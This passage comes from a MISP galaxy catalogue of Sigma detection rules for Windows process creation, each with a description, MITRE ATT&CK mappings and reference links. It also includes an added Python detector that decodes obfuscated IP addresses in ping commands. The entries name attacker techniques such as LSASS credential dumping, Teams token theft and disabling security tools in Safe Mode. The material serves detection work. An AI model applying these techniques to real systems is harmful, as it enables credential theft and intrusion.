Table 10750. Table References

Links

https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf

https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml

LSASS Dump Keyword In CommandLine

Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.

The tag is: misp-galaxy:sigma-rules="LSASS Dump Keyword In CommandLine"

LSASS Dump Keyword In CommandLine has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10751. Table References

Links

https://github.com/Hackndo/lsassy

https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf

https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml

https://github.com/CCob/MirrorDump

https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/

https://github.com/helpsystems/nanodump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

The tag is: misp-galaxy:sigma-rules="AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl"

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10752. Table References

Links

https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml

Suspicious Splwow64 Without Params

Detects suspicious Splwow64.exe process without any command line parameters

The tag is: misp-galaxy:sigma-rules="Suspicious Splwow64 Without Params"

Suspicious Splwow64 Without Params has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10753. Table References

Links

https://twitter.com/sbousseaden/status/1429401053229891590?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_splwow64_cli_anomaly.yml

CreateDump Process Dump

Detects uses of the createdump.exe LOLBIN utility to dump process memory.

The tag is: misp-galaxy:sigma-rules="CreateDump Process Dump"

CreateDump Process Dump has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10754. Table References

Links

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

https://twitter.com/bopin2020/status/1366400799199272960

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_createdump_lolbin_execution.yml

RunDLL32 Spawning Explorer

Detects RunDLL32.exe spawning explorer.exe as a child, which is very uncommon; Gamarue has often been observed spawning the explorer.exe process in this unusual way.

The tag is: misp-galaxy:sigma-rules="RunDLL32 Spawning Explorer"

RunDLL32 Spawning Explorer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10755. Table References

Links

https://redcanary.com/blog/intelligence-insights-november-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_spawn_explorer.yml

Suspicious Copy From or To System Directory

Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.

The tag is: misp-galaxy:sigma-rules="Suspicious Copy From or To System Directory"

Suspicious Copy From or To System Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10756. Table References

Links

https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120

https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/

https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir.yml

Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)

Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)

The tag is: misp-galaxy:sigma-rules="Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)"

Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10758. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml

Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN

dotnet.exe will execute any DLL and thereby run unsigned code.

The tag is: misp-galaxy:sigma-rules="Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN"

Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10760. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/

https://twitter.com/_felamos/status/1204705548668555264

https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml

VMToolsd Suspicious Child Process

Detects suspicious child process creations of VMware Tools process which may indicate persistence setup

The tag is: misp-galaxy:sigma-rules="VMToolsd Suspicious Child Process"

VMToolsd Suspicious Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10761. Table References

Links

https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/

https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf

https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml

Veeam Backup Database Suspicious Query

Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.

The tag is: misp-galaxy:sigma-rules="Veeam Backup Database Suspicious Query"

Veeam Backup Database Suspicious Query has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 10762. Table References

Links

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml

Detected Windows Software Discovery

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.

The tag is: misp-galaxy:sigma-rules="Detected Windows Software Discovery"

Detected Windows Software Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

Table 10763. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md

https://github.com/harleyQu1nn/AggressorScripts

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_software_discovery.yml

Windows Shell/Scripting Processes Spawning Suspicious Programs

Detects suspicious child processes of Windows shell and scripting processes such as wscript, rundll32, powershell, mshta, etc.

The tag is: misp-galaxy:sigma-rules="Windows Shell/Scripting Processes Spawning Suspicious Programs"

Windows Shell/Scripting Processes Spawning Suspicious Programs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10764. Table References

Links

https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml

AgentExecutor PowerShell Execution

Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by the 6th positional argument.

The tag is: misp-galaxy:sigma-rules="AgentExecutor PowerShell Execution"

AgentExecutor PowerShell Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10765. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/

https://twitter.com/jseerden/status/1247985304667066373/photo/1

https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension

https://twitter.com/lefterispan/status/1286259016436514816

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml

Powershell Inline Execution From A File

Detects inline execution of PowerShell code from a file

The tag is: misp-galaxy:sigma-rules="Powershell Inline Execution From A File"

Powershell Inline Execution From A File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10766. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_exec_data_file.yml

New Kernel Driver Via SC.EXE

Detects creation of a new service (kernel driver) with the type "kernel"

The tag is: misp-galaxy:sigma-rules="New Kernel Driver Via SC.EXE"

New Kernel Driver Via SC.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10767. Table References

Links

https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_new_kernel_driver.yml

Gpresult Display Group Policy Information

Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information

The tag is: misp-galaxy:sigma-rules="Gpresult Display Group Policy Information"

Gpresult Display Group Policy Information has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

Table 10768. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md

https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/

https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml

Use of FSharp Interpreters

The FSharp interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and are listed in the Microsoft recommended block rules.

The tag is: misp-galaxy:sigma-rules="Use of FSharp Interpreters"

Use of FSharp Interpreters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10769. Table References

Links

https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml

Hardware Model Reconnaissance Via Wmic.EXE

Detects the execution of WMIC with "csproduct", which is used to obtain information such as hardware models and vendor information.

The tag is: misp-galaxy:sigma-rules="Hardware Model Reconnaissance Via Wmic.EXE"

Hardware Model Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10770. Table References

Links

https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks

https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_csproduct.yml

Potentially Suspicious Command Targeting Teams Sensitive Files

Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Command Targeting Teams Sensitive Files"

Potentially Suspicious Command Targeting Teams Sensitive Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 10771. Table References

Links

https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens

https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml

Remote Access Tool - AnyDesk Piped Password Via CLI

Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - AnyDesk Piped Password Via CLI"

Remote Access Tool - AnyDesk Piped Password Via CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10772. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml

VolumeShadowCopy Symlink Creation Via Mklink

Shadow Copies storage symbolic link creation using operating system utilities.

The tag is: misp-galaxy:sigma-rules="VolumeShadowCopy Symlink Creation Via Mklink"

VolumeShadowCopy Symlink Creation Via Mklink has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10773. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml

Import LDAP Data Interchange Format File Via Ldifde.EXE

Detects the execution of "Ldifde.exe" with the import flag "-i". This can be abused to include HTTP-based arguments, which allow the arbitrary download of files from a remote server.

The tag is: misp-galaxy:sigma-rules="Import LDAP Data Interchange Format File Via Ldifde.EXE"

Import LDAP Data Interchange Format File Via Ldifde.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10775. Table References

Links

https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html

https://twitter.com/0gtweet/status/1564968845726580736

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml

Suspicious Microsoft Office Child Process

Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)

The tag is: misp-galaxy:sigma-rules="Suspicious Microsoft Office Child Process"

Suspicious Microsoft Office Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10776. Table References

Links

https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e

https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A

https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi(aka_REvil)_Ransomware.yaml

https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml

https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html

https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml

https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html

https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/

https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml

Suspicious Call by Ordinal

Detects suspicious calls to DLL exports by ordinal via rundll32.

The tag is: misp-galaxy:sigma-rules="Suspicious Call by Ordinal"

Suspicious Call by Ordinal has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10777. Table References

Links

https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/

https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/

https://twitter.com/cyb3rops/status/1186631731543236608

https://github.com/Neo23x0/DLLRunner

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_by_ordinal.yml

Suspicious Use of CSharp Interactive Console

Detects the execution of CSharp interactive console by PowerShell

The tag is: misp-galaxy:sigma-rules="Suspicious Use of CSharp Interactive Console"

Suspicious Use of CSharp Interactive Console has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10778. Table References

Links

https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml

PUA - Wsudo Suspicious Execution

Detects usage of wsudo (Windows Sudo Utility), a tool that lets a user execute programs with different permissions (System, Trusted Installer, Administrator, etc.)

The tag is: misp-galaxy:sigma-rules="PUA - Wsudo Suspicious Execution"

PUA - Wsudo Suspicious Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10779. Table References

Links

https://github.com/M2Team/Privexec/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml

Use of TTDInject.exe

Detects the execution of TTDInject.exe, which Windows 10 v1809 and newer use for Time Travel Debugging (it is invoked under the hood by tttracer.exe)

The tag is: misp-galaxy:sigma-rules="Use of TTDInject.exe"

Use of TTDInject.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10780. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml

Suspicious PowerShell IEX Execution Patterns

Detects suspicious ways of running Invoke-Expression via its IEX alias

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell IEX Execution Patterns"

Suspicious PowerShell IEX Execution Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10781. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2

https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml

Deny Service Access Using Security Descriptor Tampering Via Sc.EXE

Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.

The tag is: misp-galaxy:sigma-rules="Deny Service Access Using Security Descriptor Tampering Via Sc.EXE"

Deny Service Access Using Security Descriptor Tampering Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10782. Table References

Links

https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/

https://www.sans.org/blog/red-team-tactics-hiding-windows-services/

https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml

Ping Hex IP

Detects a ping command that uses a hex encoded IP address

The tag is: misp-galaxy:sigma-rules="Ping Hex IP"

Ping Hex IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10783. Table References

Links

https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna

https://twitter.com/vysecurity/status/977198418354491392

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ping_hex_ip.yml
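
The rule above keys on a literal "0x" in a ping command line. The following added example (not part of the Sigma rule or of the MISP galaxy) goes further than the rule: ping resolves its target through inet_addr, which also accepts decimal and octal 32-bit values, a.b and a.b.c short forms, and per-octet hex, so the decoder below normalises that whole family to a dotted quad that can be compared against indicator lists. The command lines are constructed.

```python
"""Decode the alternative IPv4 spellings that ping (via inet_addr) accepts.

Added example, not part of the Sigma rule or the MISP galaxy. It generalises
beyond the rule's "0x" check to the full inet_addr notation family.
The command lines below are constructed.
"""
import re

_NUMBER = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")
_PING = re.compile(r"(?i)\bping(?:\.exe)?\b(.*)$")
# ping switches that consume the following token (so "-n 1" is not decoded as 0.0.0.1)
_VALUE_SWITCHES = {"n", "l", "i", "v", "r", "s", "j", "k", "w", "c"}


def _c_int(part):
    """Parse one dotted component like the C runtime: 0x.. hex, leading 0 octal, else decimal."""
    if not _NUMBER.match(part):
        raise ValueError(f"not numeric: {part!r}")
    low = part.lower()
    if low.startswith("0x"):
        return int(low[2:], 16)
    if len(low) > 1 and low.startswith("0"):
        return int(low, 8)
    return int(low, 10)


def inet_addr_like(text):
    """Return the dotted quad inet_addr would resolve `text` to; ValueError if it is not an address."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError("too many components")
    values = [_c_int(p) for p in parts]
    head, last = values[:-1], values[-1]
    # Leading components are single octets; the last one fills whatever bytes remain.
    remaining_bits = 32 - 8 * len(head)
    if any(v > 0xFF for v in head) or last >= (1 << remaining_bits):
        raise ValueError("component out of range")
    addr = 0
    for v in head:
        addr = (addr << 8) | v
    addr = (addr << remaining_bits) | last
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def detect_obfuscated_ping(cmdline):
    """Return [(raw_token, decoded)] for ping targets written in anything but plain dotted-quad form."""
    m = _PING.search(cmdline)
    if not m:
        return []
    findings, skip_next = [], False
    for tok in m.group(1).split():
        if skip_next:
            skip_next = False
            continue
        if tok[0] in "-/":
            skip_next = tok[1:].lower() in _VALUE_SWITCHES
            continue
        try:
            decoded = inet_addr_like(tok)
        except ValueError:
            continue                      # hostname or other non-numeric argument
        if decoded != tok:
            findings.append((tok, decoded))
    return findings


# Constructed command lines: only the first would trip a literal "0x" match.
SAMPLE_CMDLINES = [
    "ping 0x7f000001",
    "ping -n 1 2130706433",
    "ping.exe 0177.0.0.1",
    "cmd /c ping 127.1 -n 2",
    "ping 0x7f.0x0.0x0.0x1",
    "ping 8.8.8.8",
    "ping example.invalid",
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(f"{c!r:32} -> {detect_obfuscated_ping(c)}")
```

The first five samples all resolve to 127.0.0.1; a string-based indicator match on the raw command line sees five unrelated tokens, which is the point of the obfuscation and the reason the decoded form is what should be compared.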

LOLBIN Execution Of The FTP.EXE Binary

Detects ftp.exe script execution with the "-s" or "/s" flag, and any child process spawned by ftp.exe

The tag is: misp-galaxy:sigma-rules="LOLBIN Execution Of The FTP.EXE Binary"

LOLBIN Execution Of The FTP.EXE Binary has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10784. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ftp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml

Response File Execution Via Odbcconf.EXE

Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.

The tag is: misp-galaxy:sigma-rules="Response File Execution Via Odbcconf.EXE"

Response File Execution Via Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10785. Table References

Links

https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control

https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16

https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml

Potential SMB Relay Attack Tool Execution

Detects the execution of various hacktools used for relay attacks on Windows (including the Potato family) to escalate privileges

The tag is: misp-galaxy:sigma-rules="Potential SMB Relay Attack Tool Execution"

Potential SMB Relay Attack Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 10786. Table References

Links

https://pentestlab.blog/2017/04/13/hot-potato/

https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire

https://github.com/ohpe/juicy-potato

https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

https://www.localpotato.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml

Suspicious Active Directory Database Snapshot Via ADExplorer

Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the Active Directory database to a suspicious directory.

The tag is: misp-galaxy:sigma-rules="Suspicious Active Directory Database Snapshot Via ADExplorer"

Suspicious Active Directory Database Snapshot Via ADExplorer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10787. Table References

Links

https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml

SafeBoot Registry Key Deleted Via Reg.EXE

Detects execution of "reg.exe" commands with the "delete" flag on SafeBoot registry keys. Often used by attackers to prevent security products from running in Safe Mode

The tag is: misp-galaxy:sigma-rules="SafeBoot Registry Key Deleted Via Reg.EXE"

SafeBoot Registry Key Deleted Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10788. Table References

Links

